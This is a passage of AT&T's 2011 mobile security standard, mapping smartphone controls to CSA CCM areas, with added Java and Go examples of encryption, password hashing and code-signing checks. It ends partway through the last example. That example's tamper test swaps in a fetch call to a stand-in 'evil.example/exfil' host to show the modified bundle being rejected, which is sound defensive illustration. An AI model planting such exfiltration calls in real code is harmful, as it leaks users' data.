Enterprise Mobility Security Standard (EMSS)
by AT&T Chief Security Office, ESPCP
The steady double-digit growth of threats to smartphones makes security awareness and action imperative. Recognizing the seriousness of these threats and the ubiquitous, business-critical nature of the mobile applications used by enterprises today, the AT&T Chief Security Office (CSO) has prepared this document containing a comprehensive set of controls for ensuring the security of mobile applications and platforms. Enterprises may use these security controls as a step-by-step method for auditing and strengthening the security of their mobile applications and providers. Alternatively, enterprises may engage AT&T Consulting to perform a mobility security audit using the standards in this document.
The aim of the Enterprise Mobility Security Standard (EMSS) is to provide a compelling
suite of mobile security controls that tackle the growing security challenges associated with
the revolution in mobile data utility around smartphones. Within the context of an overall
information security program, organizations need to implement mobile security controls to
provide adequate data and information protection and to ensure that the many applicable
regulatory or compliance concerns are sufficiently addressed in smartphones and associated
ecosystems.
EMSS provides a basis for testing smartphone security controls, as well as any technical
security controls in the environment, that are relied on to protect against threats to
smartphones such as malware payloads. This standard can be used to establish a level of
confidence in smartphone and associated ecosystem security.
The EMSS security controls were aggregated with the following objectives in mind:
• Use as a metric - Provide application developers, application purveyors, and those acquiring applications with a yardstick with which to assess the degree of trust that can be placed in smartphone applications,
• Use as guidance - For the mobile application market that is growing at a breakneck pace, provide guidance to security solution developers as to what to build into their products slated for mobile platforms, and
• Use during procurement - Provide a basis for specifying application security verification requirements for mobile platforms in contracts.
P a g e | 1 © 2011 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property.
EMSS uses a subset of the Control Areas from the Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM) as an overarching framework, with focus on the following key assessment categories:
• Mobile Device Security and Management Controls
• Application Controls
• Data Controls
• Network Level Controls and Protections
• Machine to Machine (M2M) Security
Use of the CSA CCM offers the added benefit that the mobile security controls are aligned with applicable standards (e.g. COBIT, HIPAA, ISO, NIST and PCI).
The Security Control Specifications contained in this document are attributed to the Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM) Version 1.1, and are represented with approval from CSA. Please visit http://www.cloudsecurityalliance.org/cm.html for more information.
Enterprise Mobility Security Standard (EMSS), Mobile Security Controls with Assessment Categories mapped to a subset of Control Areas from Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM)

Each row below gives the CSA-CCM Control Area & Control ID, the CSA-CCM Security Control Specification, and the Mapped Mobile Security Controls grouped by Assessment Category.

Control Area & Control ID: Data Governance - Ownership / Stewardship (DG-01)
Security Control Specification: All data shall be designated with stewardship with assigned responsibilities defined, documented and communicated.
Mapped Mobile Security Controls:
Data Controls
1. The designated proprietary information, for which company employees and authorized contracted workers have custodian responsibility, must be protected by them when reading, transferring and/or storing this information on wireless handheld mobile devices [smartphones].
2. Smartphone users must complete awareness training about protecting the company, its data and information against theft, loss and/or malicious use, and must execute an acceptable use agreement.

Control Area & Control ID: Facility Security - User Access (FS-02)
Security Control Specification: Physical access to information assets and functions by users and support personnel shall be restricted.
Mapped Mobile Security Controls:
Network Level Controls and Protections
1. Wireless hardware (e.g. APs) connected to the company's networks must be company authorized and located in company controlled space. This does not include wireless network cards.
2. All supplier contracts for support services, including access to mobile infrastructure equipment, must include appropriate requirements for security controls.
Control Area & Control ID: Facility Security - Asset Management (FS-08)
Security Control Specification: A complete inventory of critical assets shall be maintained with ownership defined and documented.
Mapped Mobile Security Controls:
Mobile Device Security and Management Controls
1. Smartphone Asset Management should include:
a. Centralized registration designating Company Official Use (COU) or Personal Owned
b. Asset reporting
c. Compliance reporting
d. Self-service [re: registration, lock, wipe, password change, locate, etc.]
3. A personal owned smartphone must implement two separately contained processing environments, one for company business information processing and storage and one for personal information. This configuration must ensure separation of business and personal information on the smartphone.
4. Smartphone software used to process and store company information must be obtained from the company approved software inventory and/or app store(s), and the smartphone must be scanned for malware and unauthorized applications.
5. Jailbroken smartphones must not access company data.
Network Level Controls and Protections
6. Personal owned smartphones should be scanned for compliance with company security standards and configurations before they access the company network.
Control Area & Control ID: Information Security - User Access Restriction / Authorization (IS-08)
Security Control Specification: Normal and privileged user access to applications, systems, databases, network configurations, and sensitive data and functions shall be restricted and approved by management prior to access granted.
Mapped Mobile Security Controls:
Mobile Device Security and Management Controls
1. The company should authorize use of wireless handheld devices based on what equipment and services employees are eligible to receive, predicated on their job role.
2. Access should only be granted to necessary services based on job role, e.g. EAS [Exchange ActiveSync], PIM [Personal Information Manager] sync (Calendar, Contacts, Tasks, Memo, ...), VPN, etc.
Control Area & Control ID: Information Security - Encryption (IS-18)
Security Control Specification: Policies and procedures shall be established and mechanisms implemented for encrypting sensitive data in storage (e.g., file servers, databases, and end-user workstations and mobile devices) and data in transmission (e.g., system interfaces, over public networks, and electronic messaging).
Mapped Mobile Security Controls:
Data Controls
1. The encryption used for protection of data at rest and in transit shall be industry standard encryption.
2. Key lengths: Symmetric encryption key lengths must be at least 112 bits long. A 256-bit key length is preferred, unless it impacts the responsiveness of the application. Asymmetric key lengths must be at least 1024 bits.
3. One-way hashes of PINs or passwords should include a random 64-bit salt.
4. Content stored on the smartphone should be encrypted.
5. PIM [Personal Information Manager] sync, and all data transfer, should be encrypted.
Control Area & Control ID: Information Security - Encryption Key Management (IS-19)
Security Control Specification: Policies and procedures shall be established and mechanisms implemented for effective key management to support encryption of data in storage and in transmission.
Mapped Mobile Security Controls:
1. A documented operational model must exist for each application that manages keys. The operational model must include defined roles and responsibilities for each key management function and a description of how key management standards for each function are met.
2. Encryption keys [classified as proprietary information] must not be stored, cached or "remembered" in plain text, and must not be hard coded in the application. [Consider using key stores provided by the operating system.] If stored on removable media, such as a USB drive or memory card, the user must take precautions to physically secure the media.
3. The decryption key should be stored on the system and the messaging server residing at the Company's facilities.
4. Encryption keys should be unique for each handset instance.
5. Encryption keys, and salt and nonce values, should be generated securely, as random numbers [e.g. using SecureRandom or Microsoft CryptoAPI].
6. Encryption keys should be coded into mutable primitive arrays, not immutable objects. The arrays should be zeroed out before freeing for garbage collection.
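The IS-18 key-length figure and IS-19 items 5 and 6 in working form, as an added example that is not part of the EMSS text: a 256-bit AES key drawn from SecureRandom, a fresh random nonce per stored record, authenticated encryption (AES-GCM) so that a modified record is rejected instead of being decrypted to garbage, and zeroing of the key and plaintext buffers in a finally block. The class name, the "record:contacts:v1" label and the sample record are assumptions. On a real handset the key would be generated in and kept by the platform key store as item 2 advises; the byte[] here stands in only so the example runs on a desktop JVM. One caveat on item 2 of IS-18: the 1024-bit asymmetric minimum reflects 2011 guidance, and NIST SP 800-131A has since disallowed 1024-bit RSA for new use, making 2048 bits the practical minimum.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.AEADBadTagException;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;

/* Added example, not part of the EMSS text. Encrypts a record for local storage on the
 * handset with a 256-bit AES key (IS-18 item 2, preferred length), a random 96-bit nonce
 * per record (IS-19 item 5) and zeroization of secrets held in byte[] (IS-19 item 6).
 * Assumption: the key lives in a byte[] so this runs on a desktop JVM; on a device it
 * belongs in the OS key store (IS-19 item 2). */
public final class AtRestCrypto {
    private static final SecureRandom RNG = new SecureRandom();
    private static final int KEY_BYTES = 32;    // 256-bit AES key
    private static final int NONCE_BYTES = 12;  // 96-bit GCM nonce, fresh for every seal()
    private static final int TAG_BITS = 128;    // GCM authentication tag length

    /** Returns a fresh random key; the caller owns the array and must wipe() it when done. */
    public static byte[] newKey() {
        byte[] key = new byte[KEY_BYTES];
        RNG.nextBytes(key);
        return key;
    }

    /** Returns nonce || ciphertext || tag. aad is authenticated but not encrypted (e.g. a record label). */
    public static byte[] seal(byte[] key, byte[] plaintext, byte[] aad) throws GeneralSecurityException {
        byte[] nonce = new byte[NONCE_BYTES];
        RNG.nextBytes(nonce);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"), new GCMParameterSpec(TAG_BITS, nonce));
        c.updateAAD(aad);
        byte[] ct = c.doFinal(plaintext);
        byte[] out = new byte[NONCE_BYTES + ct.length];
        System.arraycopy(nonce, 0, out, 0, NONCE_BYTES);
        System.arraycopy(ct, 0, out, NONCE_BYTES, ct.length);
        return out;
    }

    /** Reverses seal(); throws AEADBadTagException if the record or the aad was modified. */
    public static byte[] open(byte[] key, byte[] sealed, byte[] aad) throws GeneralSecurityException {
        if (sealed.length < NONCE_BYTES + TAG_BITS / 8) {
            throw new GeneralSecurityException("sealed record too short to carry nonce and tag");
        }
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(key, "AES"),
               new GCMParameterSpec(TAG_BITS, sealed, 0, NONCE_BYTES));
        c.updateAAD(aad);
        return c.doFinal(sealed, NONCE_BYTES, sealed.length - NONCE_BYTES);
    }

    /** Overwrites secret buffers so they do not linger in the heap until garbage collection. */
    public static void wipe(byte[]... buffers) {
        for (byte[] b : buffers) {
            if (b != null) Arrays.fill(b, (byte) 0);
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] key = newKey();
        byte[] aad = "record:contacts:v1".getBytes(StandardCharsets.UTF_8);       // assumed record label
        byte[] plain = "Jane Doe, +1 555 0100".getBytes(StandardCharsets.UTF_8);  // constructed sample record
        byte[] back = null;
        try {
            byte[] sealed = seal(key, plain, aad);
            back = open(key, sealed, aad);
            System.out.println("round trip ok: " + Arrays.equals(plain, back));
            sealed[sealed.length - 1] ^= 0x01;          // flip one bit of the authentication tag
            try {
                open(key, sealed, aad);
                System.out.println("BUG: tampered record was accepted");
            } catch (AEADBadTagException e) {
                System.out.println("tampered record rejected");
            }
        } finally {
            wipe(key, plain, back);                      // IS-19 item 6: zero before the arrays become garbage
        }
    }
}
```

Two design points worth knowing before copying this: a GCM nonce must never repeat under one key, and a 96-bit random nonce is safe for the number of records a handset will ever store, but not for a high-volume server; and SecretKeySpec keeps its own internal copy of the key that Java code cannot wipe, which is exactly why item 2 points at the operating system's key store for production use.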
Control Area & Control ID: Information Security - Anti-Virus / Malicious Software (IS-21)
Security Control Specification: Ensure that all antivirus programs are capable of detecting, removing, and protecting against all known types of malicious or unauthorized software with antivirus signature updates at least every 12 hours.
Mapped Mobile Security Controls:
Mobile Device Security and Management Controls
1. The mobile ecosystem [Device, Network and Cloud] must include the capability [e.g. a gateway] to detect malware and prevent it from installing itself in the end-to-end Mobile Service, which includes cloud computing networked to endpoints or smartphones.
2. In-house and 3rd party developed applications should be digitally signed. When these applications are downloaded, this code signing mechanism should be used to confirm the integrity of the application and its mobile code, as well as to prevent malware from installing itself on a smartphone. This control is focused on user applications, not preloaded factory software provided by the smartphone manufacturer.
3. Monitoring or scanning software should be capable of identifying and quarantining an infected smartphone, or wiping the company managed smartphone, returning it to factory build state, or wiping it with "poison pill" encryption where the poison pill is reversible, i.e. when the device is returned the IT department can restart it and decrypt its storage with a special password.

Control Area & Control ID: Information Security - Portable / Mobile Devices (IS-32)
Security Control Specification: Policies and procedures shall be established and measures implemented to strictly limit access to sensitive data from portable and mobile devices, such as laptops, cell phones, and personal digital assistants (PDAs), which are generally higher-risk than non-portable devices (e.g., desktop computers at the organization's facilities).
Mapped Mobile Security Controls:
Mobile Device Security and Management Controls
1. Mobile Computing: Access Control for Wireless Handheld Computing Systems or smartphones
a. An appropriate account management team must provision the wireless handheld computing device or smartphone account on the push wireless email/wireless mobile message server, e.g. BlackBerry Enterprise Server (BES), Good Mobile Messaging (GMM) or Microsoft Exchange ActiveSync (MS EAS). [Here the wireless mobile message server acts as a proxy to the user's email box via the permission granted through a service account on the wireless mobile message server.]
2. The wireless handheld computing system or smartphone:
a. Must enforce passwords on all the devices that are part of the Wireless Messaging Architecture.
b. Must not allow users the ability to disable the password on the device or smartphone.
c. Must implement a password of at least 6 characters in length. Password complexity is recommended.
d. Should have a timeout interval [e.g. a maximum of 15 minutes] after which the smartphone locks.
e. Should have a setting interval [e.g. no higher than 180 days] after which the user will be prompted to change the smartphone password.
f. Must provide System Administrators with over-the-air capability to delete the user, apply additional policies, and wipe data with verification of the wipe, as necessary.
3. Wireless handheld computing system or smartphone management ecosystem:
a. Must include applying the password policies over-the-air to the devices.
4. Wireless handheld computing system or smartphone data:
a. Must be automatically wiped after a specified number of failed password attempts [e.g. no higher than 7 attempts as the maximum], and the over-the-air wipe must be confirmed.
b. Must be wiped when the smartphone is going out of service or being reassigned.
c. Smartphones should be integrated with backup and recovery services [e.g. some smartphone platforms include 'cloud' backup storage].
5. In conjunction with the Company's Compliance Program, internal 'push wireless email' infrastructure servers must be hardened according to standard security practices, including maintaining current patches, removal of default passwords, periodic scanning and remediation of security vulnerabilities, along with periodic review of access privileges.
6. External 'push wireless email' servers must be hardened according to standard security practices, including sustaining current patches, removal of default passwords, periodic scanning and remediation of security vulnerabilities, along with periodic review of access privileges, consistent with the security requirements contained in the contract between the company and the 3rd party supplier.
7. Company Restricted and Sensitive Personal proprietary information must not be copied from
primary sources and stored on smartphone removable or portable media (such as USB flash drives, memory sticks, or memory cards) unless there is a business need and written approval is obtained (and retained) from a Company Executive with appropriate delegation of authority, and it is stored and/or transmitted encrypted, except where:
(a) the media remains in a Company controlled space as part of a documented business process,
(b) individual customer information is shipped to a customer on electronic media,
(c) there is a business need to transfer data between Company locations or storage of backups from official company data centers.
(d) the approved smartphone removable or portable media [e.g. memory card] containing proprietary information:
- Must either be kept in the direct supervision of the custodian or physically secured from unauthorized access (e.g. in a locked office, desk, or filing cabinet), and
- Must not leave the direct supervision of the custodian when traveling on public transport (e.g. must not be placed in a taxi trunk/boot or bus hold/baggage storage, or checked in on an airplane).
Control Area & Control ID: Resiliency - Business Continuity Planning (RS-03)
Security Control Specification: A consistent unified framework for business continuity planning and plan development shall be established, documented and adopted to ensure all business continuity plans are consistent in addressing priorities for testing and maintenance and information security requirements. Requirements for business continuity plans include the following:
• Defined purpose and scope, aligned with relevant dependencies
• Accessible to and understood by those who will use them
• Owned by a named person(s) who is responsible for their review, update and approval
• Defined lines of communication, roles and responsibilities
• Detailed recovery procedures, manual work-around and reference information
• Method for plan invocation
Mapped Mobile Security Controls:
1. Business Continuity planning to sustain or recover end-to-end Mobile service from Cell Tower radio access network (RAN) to Data Center or Cloud Computing should include:
(a) a managed process established throughout the organization that addresses the information security requirements needed for the organization's business continuity.
(b) identification, along with the probability and impact, of events that can cause interruptions to business and their consequences for information security.
(c) development and implementation of plans to maintain or restore operations and ensure availability of information, applications and equipment at the required level and in the required time scales following interruption to, or failure of, critical business processes.
(d) a single framework for business continuity plans to ensure that all plans are consistent, re: addressing information security requirements, and establishing priorities for testing and maintenance.
Control Area & Control ID: Resiliency - Business Continuity Testing (RS-04)
Security Control Specification: Business continuity plans shall be subject to test at planned intervals or upon significant organizational or environmental changes to ensure continuing
Mapped Mobile Security Controls:
1. Business continuity plans should be tested and updated regularly to ensure that they are current and effective.
Control Area & Control ID: Security Architecture - Data Security / Integrity (SA-03)
Security Control Specification: Policies and procedures shall be established and mechanisms implemented to ensure security (e.g., encryption, access controls, and leakage prevention) and integrity of data exchanged between one or more system interfaces, jurisdictions, or with a third party shared services provider to prevent improper disclosure, alteration or destruction, complying with legislative, regulatory, and contractual requirements.
Mapped Mobile Security Controls:
Data Controls
1. Application Data Integrity for Wireless Handheld Mobile System or Smartphone
a. Based on data sensitivity, application data on a smartphone must be stored in local protected and/or encrypted storage (local key store, local file system, local nonvolatile memory, and/or local database, etc.) and must be encrypted using industry standard encryption algorithms.
b. A mobile application's private data must be protected against unauthorized access.
c. Passwords, private keys, and other confidential information must be stored in protected storage on the smartphone and encrypted. The password used to gain access to the protected information must not be stored on the smartphone.
d. Application settings and provisioning data must only be accessible to the application and smartphone management components.
e. Access, including read, write and update, to the smartphone PIM [Personal Information Manager] local address book, inbox, calendar, memo pad and other "storage" oriented applications should be subject to user control.
f. Access to smartphone run time information, including but not limited to smartphone location information, subscriber MSISDN [Mobile Subscriber Integrated Services Digital Network Number], subscriber IMSI [International Mobile Subscriber Identity], device IMEI [International Mobile Equipment Identity], GPS [Global Positioning System] or other location based data, etc., is subject to user control.
g. Over-the-air wipe of smartphone or application data
[i.e. returning it to factory build state] on a lost or
stolen smartphone based on application level
identification, subscriber MSISDN, and/or device IMEI
must be supported and must be executed “silently”
and be made uninterruptible by user interaction.
h. Sandboxing: Application settings and provisioning
data must only be accessible to the application and its
corresponding smartphone management components.
The data must be protected against access by other
mobile applications. When shared with other
applications, the data must continue to be
inaccessible to unauthorized applications. Data that
is private to a specific user or user session must only
be accessible to that specific user or session.
Control Area & Control ID: Security Architecture - Application Security (SA-04)
Security Control Specification: Applications shall be designed in accordance with industry accepted security standards (i.e., OWASP for web applications) and comply with applicable regulatory and business requirements.
Mapped Mobile Security Controls:
Application Controls
1. Applications must not contain “back-door” code that
allows privileged access that bypasses the
identification and authentication processes.
2. Encryption keys and passwords should be coded into
mutable primitive arrays, not immutable objects. The
arrays should be zeroed out before freeing for
garbage collection e.g., Java coders should use
character arrays, not String objects to store sensitive
data. And those arrays should be zeroed out in finally
clauses, prior to garbage collection. [This will reduce
the chance of an attack on the memory of the device
revealing sensitive information].
3. Authorization logic must be carefully designed to
prevent escalation of privilege attacks. All
architecture patterns (especially web solutions)
should apply access-control filters to provide fail-safe
access controls.
4. Application Packaging Security
a. Only the company authorized release version of the
mobile software should be used in production.
b. The release version of the smartphone software
should be code signed by the company, or company
approved provisioning entity, such as Apple iTunes,
where applicable.
c. Mobile software developed using interpreter based
languages, e.g. J2ME, .NET, should be obfuscated to
prevent hackers from leveraging the implementation
logic and finding ways to attack through reverse
engineering.
d. Privilege manifest, i.e. privileges and resources that a
mobile executable requires for normal execution
should be clearly specified in the release package.
e. A mobile application should be able to be hidden, be
minimized, be paused, and be stopped and resumed
to save smartphone power and for the courtesy of
other applications on the smartphone.
5. Company should test all enterprise use mobile
applications, especially if they access company data.
Control Area & Control ID: Security Architecture - Data Integrity (SA-05)
Security Control Specification: Data input and output integrity routines (i.e., reconciliation and edit checks) shall be implemented for application interfaces and databases to prevent manual or systematic processing errors or corruption of data.
Mapped Mobile Security Controls:
Data Controls
1. Data input from non-approved sources (client applications, interfaces, databases, configuration, data and property files) must be validated for size, type, quantity, and permitted range of values before the data values are used for computations.

Control Area & Control ID: Security Architecture - Wireless Security (SA-10)
Security Control Specification: Policies and procedures shall be established and mechanisms implemented to protect wireless network environments, including the following:
• Perimeter firewalls implemented and configured to restrict unauthorized traffic
• Security settings enabled with strong encryption for authentication and transmission, replacing vendor default settings (e.g., encryption keys, passwords, SNMP community strings, etc.)
• Logical and physical user access to wireless network devices restricted to authorized personnel
• The capability to detect the presence of unauthorized (rogue) wireless network devices for a timely disconnect from the network
Mapped Mobile Security Controls:
Network Level Controls and Protections
1. Mobile Computing: Connectivity
a. The connection(s) between company systems/smartphones and any vendor systems must go through a company firewall/security gateway and must use a secure connection (Secure Sockets Layer [SSL]/TLS).
b. End-to-end VPN access through a Virtual Private Gateway (VPG) should be used for data protection when connecting a VPN enabled smartphone to a cloud based application.
c. HTTPS should be used between mobile applications and web servers to protect the data stream, regardless of whether the data flows over the 3G network, transits the Internet, or utilizes WiFi connectivity, where warranted by data sensitivity.
Application Control
1. Application Transport Security
The available 'network' transport type can be WLAN, GSM/GPRS/EDGE/UMTS, Wi-Fi, WiMax, Bluetooth, Infrared, USB, etc. Each transport may be capable of voice, data and/or signaling transmission. Further, each transport may implement one or more transport-level [protocol] stacks, e.g. TCP/IP, SMS, IMS, WAP, etc.
The requirements for transport security in the context of mobile applications are:
a. Explicit user confirmation is required before binding and connecting to a mobile system network transport to exchange data with external peer applications.
b. The application must use only those transports authorized for the application to bind and connect to external applications, devices or systems.
c. The connecting peer must be authenticated at the transport level before accepting connections. Methods may include Bluetooth authentication, WiFi authentication, verifying SSL server certificates, verifying IP address range, or using IPSec.
d. A mobile application must not act as a “relay” to
inter-connect the Company Intranet with the public
cellular network, local area network, or personal area
network, unless that functionality is specifically
identified as a requirement.
e. To reduce the risk of Denial of Service (DoS) attacks the following should be implemented: setting timeout values on receive and idle states, validating packet size and contents, validating transport parameters and content, limiting the number of concurrent connections from a peer, and limiting total concurrent connections.
f. Secure transport, using TLS for example, must use
industry standard encryption algorithms.
g. Applications that use broadcast transports (SMS,
MMS, IMS) must implement a harassment detection
and prevention mechanism.
2. Application Protocol Security
A protocol is defined when a mobile application needs to communicate with other applications to exchange application specific information. The application(s) that a mobile application interacts with can be local on-smart-device applications, or remote applications with connectivity to the mobile application.
a. The integrity of the protocol must be protected against man-in-the-middle and denial of service attacks.
b. Packet level integrity must be provided using industry standard encryption algorithms.
c. The confidentiality of any proprietary information must be protected against eavesdropping during transmission.
d. Since interaction with on-platform mobile applications (email, SMS, mobile browser, etc.) can cause privacy concerns and even fraud, this interaction must be subject to explicit confirmation control based on the sensitivity of data. Interaction includes startup, shutdown, invocation, enable, disable, and exchange of information with other applications on the mobile systems.
e. Applicable, mutual authentication of peer applications
must be conducted before actual exchange of data
begins.
3. Application Identification
a. Each user or smart device must be identified
uniquely and an identifier can belong to one and only
one user or device in a mobile application name space.
4. Application Authentication
a. Authentication credentials (Passwords, PINS,
passphrases, password hints) must be encrypted in
storage and in transit, and be masked when displayed.
b. Authentication logic should never need to read a
plaintext credential from storage; logic should always
hash a credential entered by the user, and compare
that value to the hashed stored value.
c. For Digital Certificates:
- There must be a revocation process for certificates
that have been compromised, and relying parties must
check revocation status before trusting a certificate.
- Expired or invalid certificates must not be used.
Owners of certificates must keep their certificates up to
date and renew them before expiry.
- All public key infrastructures must be authorized by
the Company.
5. Application Accountability
a. Mobile applications should include audit log
functionality.
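The following is an added worked example, not part of the EMSS text, showing Application Authentication controls 4.a and 4.b in Go: a credential is stored only as a salted PBKDF2-HMAC-SHA256 hash, and verification re-derives the hash from the entered value and compares it in constant time, so no plaintext credential is ever read from storage. The PBKDF2 routine is written out inline so the program depends only on the Go standard library; the 16-byte salt and the 100,000 iteration work factor are illustrative choices, not values from the standard.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
)

// StoredCredential is all the application persists: a per-user random salt,
// the work factor, and the derived key. The plaintext is never written.
type StoredCredential struct {
	Salt       []byte
	Iterations int
	Hash       []byte
}

// PBKDF2SHA256 is PBKDF2 (RFC 8018) over HMAC-SHA256, written out here so the
// example needs only the Go standard library. Production code may use a
// vetted library implementation instead.
func PBKDF2SHA256(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var out []byte
	for block := 1; len(out) < keyLen; block++ {
		prf.Reset()
		prf.Write(salt)
		prf.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := prf.Sum(nil) // U_1 = PRF(P, S || INT(block))
		t := append([]byte(nil), u...)
		for i := 1; i < iterations; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil) // U_i = PRF(P, U_{i-1})
			for j := range t {
				t[j] ^= u[j] // T = U_1 xor U_2 xor ... xor U_c
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// defaultIterations is an illustrative work factor (an assumption of this
// example, not a value taken from the standard).
const defaultIterations = 100_000

// Enroll derives the stored record from a credential the user has just entered.
func Enroll(credential string) (StoredCredential, error) {
	salt := make([]byte, 16)
	if _, err := rand.Read(salt); err != nil {
		return StoredCredential{}, err
	}
	return StoredCredential{
		Salt:       salt,
		Iterations: defaultIterations,
		Hash:       PBKDF2SHA256([]byte(credential), salt, defaultIterations, 32),
	}, nil
}

// Verify re-derives the hash from the entered credential and compares it to
// the stored hash in constant time. No plaintext is read from storage because
// none was ever stored.
func Verify(stored StoredCredential, entered string) bool {
	candidate := PBKDF2SHA256([]byte(entered), stored.Salt, stored.Iterations, len(stored.Hash))
	return subtle.ConstantTimeCompare(candidate, stored.Hash) == 1
}

func main() {
	rec, err := Enroll("correct horse battery staple")
	if err != nil {
		panic(err)
	}
	fmt.Println("stored salt:", hex.EncodeToString(rec.Salt))
	fmt.Println("stored hash:", hex.EncodeToString(rec.Hash))
	fmt.Println("correct credential accepted:", Verify(rec, "correct horse battery staple"))
	fmt.Println("wrong credential accepted:  ", Verify(rec, "correct horse battery stapl"))
}
```

Two enrollments of the same credential produce different records because each gets a fresh salt, so a leaked table cannot be attacked with one precomputed dictionary; the constant-time comparison keeps a remote caller from learning how many leading bytes of the hash matched.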
Network Level Controls and Protections
1. Bluetooth Security
a. Bluetooth security must protect against the following:
• Sniffing communication to capture authentication
and encryption keys.
• Device pairing initiated by an unauthorized
source.
• Unauthorized access or use of a shared service.
• Use of weak authentication credentials.
• Loss of the integrity and confidentiality of data
being transmitted and stored.
• Loss or theft of a Bluetooth device.
2. Wireless LAN Security
a. Wireless Access Points (WAPs) must be company
authorized, and WAP infrastructure [e.g. Access Points
(APs) and Dynamic Host Configuration Protocol
(DHCP) servers] must be hardened according to standard
security practices, including maintaining current
patches, removal of default passwords, periodic
scanning and remediation of security vulnerabilities,
and periodic review of access privileges.
Security Architecture, Mobile Code
SA-15
CSA-CCM Security Control Specification: Mobile code shall be
authorized before its installation and use, and the configuration
shall ensure that the authorized mobile code operates according
to a clearly defined security policy. All unauthorized mobile
code shall be prevented from executing.
Mapped Mobile Security Controls with Assessment Categories:
Application Controls
1. Common forms of mobile code are JavaScript, Java
applets, ActiveX, and Flash. Each form of mobile
code has a different security model and configuration
management process. Web interactions rely on
mobile code, either running on a Web server or Web
browser. Web applications and mobile code are
susceptible to four classes of attacks: browser-oriented,
server-oriented, network-oriented, and
user-oriented. Technical Controls that should be
selected, deployed, and maintained as safeguards
against these classes of attacks include but are not
limited to:
a. Filters that examine code at points of entry and block
or disable it if deemed harmful.
b. Cages that constrain the code’s behavior (e.g.
privilege or function) during execution.
c. Signatures that prevent code execution unless
digitally signed by an approved source.
d. Proofs that define properties of code and are
conveyed with it, which must be successfully verified
before the code is executed.
2. Application Inventory and Revocation
a. All software: OSs, applications, and tools on company
registered smartphones must be company approved
and 3rd party software must be properly licensed.
b. A company approved inventory of software must
reside in a company managed software ‘store’ that
includes software distribution or download to
company registered smartphones, only.
c. Download of application software to company
registered smartphones using sideload, where a USB
cable is tethered between a personal computer (PC)
and a smartphone, is allowed, e.g., Apple iOS
applications via iTunes.
d. Software configuration on the company registered
smartphones must be monitored or scanned
regularly. Any software identified as not approved
must trigger one or more of the following actions
depending on the vulnerability level created by the
not approved application or tool:
‐ Smartphone user notification,
‐ Selective wipe of the offending application or tool,
‐ Wipe with poison pill encryption where the “poison
pill” is reversible, i.e., when returned the IT
department can restart the device and decrypt its
storage with a special password.
‐ Administrator remote wipe of the smartphone
returning it to factory build state.
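The following is an added worked example, not part of the EMSS text or of any AT&T tool, showing control 1.c above (signatures that prevent code execution unless digitally signed by an approved source) together with the approved-source idea of 2.b. It is Go using only the standard library: a publisher signs a manifest of SHA-256 file digests with an Ed25519 key, and the gate allows execution only when the manifest's claimed signer is on an approved-key list, the signature verifies, and every file present matches its listed digest. The key identifier "corp-release-2011", the file names and the bundle contents are constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"sort"
	"strings"
)

// Manifest lists every code file in a bundle with its SHA-256 digest and
// carries one detached Ed25519 signature over the canonical manifest text.
type Manifest struct {
	Files     map[string]string // path -> hex SHA-256 of the file content
	Signer    string            // key identifier claimed by the publisher
	Signature []byte
}

// canonical renders the file list deterministically (sorted by path) so the
// signer and the verifier hash exactly the same bytes.
func canonical(files map[string]string, signer string) []byte {
	paths := make([]string, 0, len(files))
	for p := range files {
		paths = append(paths, p)
	}
	sort.Strings(paths)
	var b strings.Builder
	fmt.Fprintf(&b, "signer=%s\n", signer)
	for _, p := range paths {
		fmt.Fprintf(&b, "%s %s\n", p, files[p])
	}
	return []byte(b.String())
}

func digest(content []byte) string {
	sum := sha256.Sum256(content)
	return hex.EncodeToString(sum[:])
}

// Publish builds and signs the manifest for a bundle (path -> content).
func Publish(bundle map[string][]byte, signer string, priv ed25519.PrivateKey) Manifest {
	files := make(map[string]string, len(bundle))
	for p, c := range bundle {
		files[p] = digest(c)
	}
	return Manifest{Files: files, Signer: signer, Signature: ed25519.Sign(priv, canonical(files, signer))}
}

var (
	ErrUnknownSigner = errors.New("signer not in approved list")
	ErrBadSignature  = errors.New("manifest signature invalid")
	ErrUnlisted      = errors.New("file not covered by manifest")
	ErrTampered      = errors.New("file digest mismatch")
)

// Authorize is the execution gate: it succeeds only when the manifest is
// signed by an approved key AND every file in the bundle matches its listed
// digest. Anything unsigned, unlisted or altered fails closed.
func Authorize(bundle map[string][]byte, m Manifest, approved map[string]ed25519.PublicKey) error {
	pub, ok := approved[m.Signer]
	if !ok {
		return ErrUnknownSigner
	}
	if !ed25519.Verify(pub, canonical(m.Files, m.Signer), m.Signature) {
		return ErrBadSignature
	}
	for p, c := range bundle {
		want, listed := m.Files[p]
		if !listed {
			return fmt.Errorf("%w: %s", ErrUnlisted, p)
		}
		if want != digest(c) {
			return fmt.Errorf("%w: %s", ErrTampered, p)
		}
	}
	return nil
}

func main() {
	// Constructed data: one approved publisher key and one unapproved key.
	pubOK, privOK, _ := ed25519.GenerateKey(nil)
	_, privRogue, _ := ed25519.GenerateKey(nil)
	approved := map[string]ed25519.PublicKey{"corp-release-2011": pubOK}

	bundle := map[string][]byte{"app.js": []byte("console.log('hello')")}
	good := Publish(bundle, "corp-release-2011", privOK)
	fmt.Println("signed by approved key:  ", Authorize(bundle, good, approved))

	bundle["app.js"] = []byte("fetch('https://evil.example/exfil')")
	fmt.Println("modified after signing:  ", Authorize(bundle, good, approved))

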